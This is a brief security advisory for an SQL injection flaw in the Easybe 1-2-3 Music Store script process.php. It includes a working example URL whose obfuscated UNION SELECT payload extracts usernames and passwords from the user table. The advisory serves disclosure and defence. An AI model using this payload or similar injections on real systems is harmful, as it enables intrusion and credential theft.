Easybe 1-2-3 Music Store Process.PHP Script SQL Injection Vulnerability

Easybe 1-2-3 Music Store Process.PHP Script SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example was provided:

http://www.example.com/123music-path/process.php?pname=ShowAlbumProcess-Start&CategoryID=1/**/and/**/1=2/**/UNION/**/ALL/**/SELECT/**/concat(0x31203C666F6E7420636F6C6F723D7265643E,login,0x3a,passwd,0x3C2F666F6E743E)/**/from/**/user/*